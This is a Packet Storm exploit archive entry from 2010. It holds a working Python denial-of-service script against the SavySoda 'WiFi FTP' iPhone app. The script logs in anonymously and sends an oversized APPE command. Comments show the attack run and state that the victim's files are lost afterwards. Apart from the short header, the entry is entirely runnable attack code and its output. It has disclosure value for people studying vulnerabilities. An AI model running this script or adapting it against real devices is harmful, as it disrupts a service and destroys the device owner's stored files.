iPhone - FTP Server (WiFi FTP) Denial Of Service

2010-02-25T00:00:00
ID PACKETSTORM:86667
Type packetstorm
Reporter b0telh0
Modified 2010-02-25T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
#  
# Title: iPhone - FTP Server (WiFi FTP) by SavySoda DoS/PoC  
# Date: 02-18-2010  
# Author: b0telh0  
# Link: app store (http://itunes.apple.com/br/app/ftp-server/id346724641?mt=8)  
# Tested on: iPhone 3G (firmware 3.1.3)  
  
  
# The server doesn't crash at all, but after exploiting it  
# you can't see (list) your files anymore. You must to close the app  
# and open it again. Then you'll see that the app starts like it was  
# fresh installed and your files are gone.  
  
  
# root@bt:~# ./free_ftp.py 192.168.1.108  
#  
# [+] iPhone - FTP Server by SavySoda(WiFi FTP).  
# [+] Free version of WiFi FTP with Ad Support.  
#  
# [+] Connecting...  
# [+] 220 Service ready.  
#  
# [+] Sending username...  
# [+] Sending buffer...  
# [+] done!  
  
# root@bt:~# ftp 192.168.1.108  
# Connected to 192.168.1.108.  
# 220 Service ready.  
# Name (192.168.1.108:root): anonymous  
# 230 User logged in, proceed.  
# Remote system type is UNIX.  
# Using binary mode to transfer files.  
# ftp> ls  
# 200 Command okay.  
# 450 Requested file action not taken. File unavailable (e.g., file busy).  
# ftp> ls  
# 421 Service not available, closing control connection.  
# ftp> ls  
# Not connected.  
# ftp> bye  
  
  
import socket  
import sys  
import time  
  
crash = "\x41" * 1000  
  
def Usage():  
print ("Usage: ./free_ftp.py serv_ip\n")  
if len(sys.argv) <> 2:  
Usage()  
sys.exit(1)  
else:  
host = sys.argv[1]  
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
try:  
print "\n[+] FTP Server by SavySoda(WiFi FTP)."  
print "[+] Free version of WiFi FTP with Ad Support.\n"  
print "[+] Connecting..."  
s.connect((host, 21))  
b=s.recv(1024)  
print "[+] " +b  
except:  
print ("[-] Can't connect to ftp server!\n")  
sys.exit(1)  
print "[+] Sending username..."  
time.sleep(3)  
s.send('USER anonymous\r\n')  
s.recv(1024)  
print "[+] Sending buffer..."  
time.sleep(3)  
s.send('APPE ' + crash + '\r\n')  
s.recv(1024)  
s.close()  
print "[+] done!\n"  
sys.exit(0);  
`